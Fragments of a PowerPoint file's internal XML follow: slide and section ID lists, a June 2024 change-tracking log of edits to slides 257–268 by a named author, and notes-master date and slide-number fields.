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6" r:id="rId9"/>
    <p:sldId id="267" r:id="rId10"/>
    <p:sldId id="268"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0D5A08-38FC-4BF0-976E-7955D49ED71D}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="257"/>
            <p14:sldId id="258"/>
            <p14:sldId id="259"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Untitled Section" id="{9B03104C-3765-4B6F-AE66-86FEB12F7695}">
          <p14:sldIdLst>
            <p14:sldId id="260"/>
            <p14:sldId id="261"/>
            <p14:sldId id="262"/>
            <p14:sldId id="266"/>
            <p14:sldId id="267"/>
            <p14:sldId id="268"/>
            <p14:sldId id="263"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Untitled Section" id="{8829FB4C-303B-4282-BB9E-17652C744D8C}">
          <p14:sldIdLst>
            <p14:sldId id="264"/>
            <p14:sldId id="265"/>
            <p14:sldId id="269"/>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67FFC2-FF22-4416-8FDA-1ED967EC40A3}" v="12" dt="2024-06-12T09:31:20.33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21" Type="http://schemas.microsoft.com/office/2016/11/relationships/changesInfo" Target="changesInfos/changesInfo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microsoft.com/office/2015/10/relationships/revisionInfo" Target="revisionInfo.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KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}"/>
    <pc:docChg chg="undo redo custSel addSld delSld modSld sldOrd addSection modSection">
      <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T10:14:48.019" v="1499" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:27:37.243" v="57" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:27:37.243" v="57" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="257"/>
            <ac:spMk id="2" creationId="{67D4CAE7-92FB-49A0-191E-7B71A5C2B67F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:27:09.594" v="50" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="257"/>
            <ac:spMk id="17" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:25:57.743" v="0" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="257"/>
            <ac:spMk id="22" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod ord modClrScheme chgLayout">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T15:07:17.528" v="543"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:43:20.658" v="167" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="258"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:43:32.241" v="168" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="258"/>
            <ac:spMk id="21" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:43:32.241" v="168" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="258"/>
            <ac:spMk id="22" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:45:27.160" v="185" actId="12"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="258"/>
            <ac:spMk id="23" creationId="{28E9A193-B518-D959-B701-5A73BB4CB011}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:56:51.975" v="539" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:48:51.329" v="217" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="259"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:48:26.160" v="211" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="259"/>
            <ac:spMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:48:26.160" v="211" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="259"/>
            <ac:spMk id="10" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:56:14.412" v="535" actId="12"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="259"/>
            <ac:spMk id="11" creationId="{2AC2E613-13CF-B390-7C8E-646CA04B0F84}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:48:26.160" v="211" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="259"/>
            <ac:spMk id="12" creationId="{6BB30A13-3895-1CD1-6C71-AD31F5546D7C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:51:03.316" v="370"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="259"/>
            <ac:spMk id="13" creationId="{A2B48457-B727-F610-E390-6F2B9AD88130}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:56:51.975" v="539" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="259"/>
            <ac:picMk id="15" creationId="{F8B9517B-408D-5892-CAB8-F6453839090E}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:31:46.569" v="989" actId="255"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:19:17.359" v="549" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="260"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:19:03.389" v="547" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="260"/>
            <ac:spMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:19:03.389" v="547" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="260"/>
            <ac:spMk id="10" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:31:46.569" v="989" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="260"/>
            <ac:spMk id="11" creationId="{4CB9494F-CB3D-99CF-97DE-18384C4FF339}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:26:04.103" v="903" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="260"/>
            <ac:picMk id="13" creationId="{96C9E29C-98C2-E3F8-6A4A-9585C8F419CF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:27:12.130" v="905" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="260"/>
            <ac:picMk id="15" creationId="{B1D2CF31-2675-5BCC-34D8-DA2BDC8D833D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:29:51.439" v="908" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="260"/>
            <ac:picMk id="17" creationId="{2520CC89-2BCC-CDBE-D513-8EDC5D7FB8D3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:35:55.998" v="1005" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:34:56.176" v="995" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="261"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:35:12.319" v="997" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="261"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:34:31.522" v="990" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="261"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:35:55.998" v="1005" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="261"/>
            <ac:spMk id="9" creationId="{04424235-4229-535E-03E7-C5138D572D07}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:43:04.904" v="1022" actId="255"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="262"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:37:11.440" v="1012" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="262"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:36:54.658" v="1008" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="262"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:36:54.658" v="1008" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="262"/>
            <ac:spMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:43:04.904" v="1022" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="262"/>
            <ac:spMk id="10" creationId="{5670CA18-5EB9-40D3-8216-A7599386802B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:36:59.721" v="1009" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="262"/>
            <ac:picMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:57:10.850" v="1239" actId="123"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:53:39.926" v="1063" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="263"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:53:49.072" v="1064" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="263"/>
            <ac:spMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:57:10.850" v="1239" actId="123"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="263"/>
            <ac:spMk id="9" creationId="{1EE112B5-808D-8A68-D162-6AD0F842AAC0}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T10:14:48.019" v="1499" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="264"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T10:10:05.888" v="1261" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="264"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T10:10:07.384" v="1263" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="264"/>
            <ac:spMk id="10" creationId="{AFAD75C8-7C60-C06B-BBEE-4049904A5B23}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T10:10:07.384" v="1263" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="264"/>
            <ac:spMk id="11" creationId="{3189E137-A043-9A33-EF10-DA602EDB8147}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T10:11:54.455" v="1267" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="264"/>
            <ac:spMk id="13" creationId="{A273F647-FEE6-D080-3578-F5ACA87FCD22}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T10:12:04.234" v="1269" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="264"/>
            <ac:spMk id="15" creationId="{CC81AA79-B151-BC2C-4BC7-A5EE5993DEED}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T10:14:48.019" v="1499" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="264"/>
            <ac:spMk id="17" creationId="{11FC879F-54C5-DF41-9278-7F4E757B4D14}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T10:06:52.735" v="1255" actId="12"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="265"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T10:06:52.735" v="1255" actId="12"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="265"/>
            <ac:spMk id="12" creationId="{78E4CC72-D216-4C0D-A3B1-B04338A93FE6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:57:25.014" v="1240" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="265"/>
            <ac:picMk id="10" creationId="{C5AD288D-D022-38C5-B51F-3B1ED8599364}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:44:02.945" v="1025"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="127950332" sldId="266"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:44:02.945" v="1025"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="127950332" sldId="266"/>
            <ac:spMk id="2" creationId="{5B7CF68C-8AB2-5381-F366-AF79105535D0}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-11T00:26:56.061" v="545" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2329732180" sldId="266"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T15:05:34.139" v="541" actId="680"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3931855116" sldId="266"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:47:23.432" v="1044"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2625086820" sldId="267"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:47:23.432" v="1044"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2625086820" sldId="267"/>
            <ac:spMk id="2" creationId="{C4B1E2A3-77C7-CCFC-CAB4-6DAF56BBF1D5}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:49:27.077" v="1056" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2722415194" sldId="268"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:49:12.030" v="1052" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2722415194" sldId="268"/>
            <ac:spMk id="2" creationId="{DBD4D83A-16FC-0DC4-8AE2-AB8B86C0FD4C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:49:27.077" v="1056" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2722415194" sldId="268"/>
            <ac:picMk id="4" creationId="{E55F5ED2-416E-6A73-374B-95553742245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145284F-5CA7-4F9C-9178-B57AA3CAF91E}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>13-06-2024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C59E6E6-AA52-4FC6-9E02-7DEAFB8870EB}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2939452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t>12</a:t>
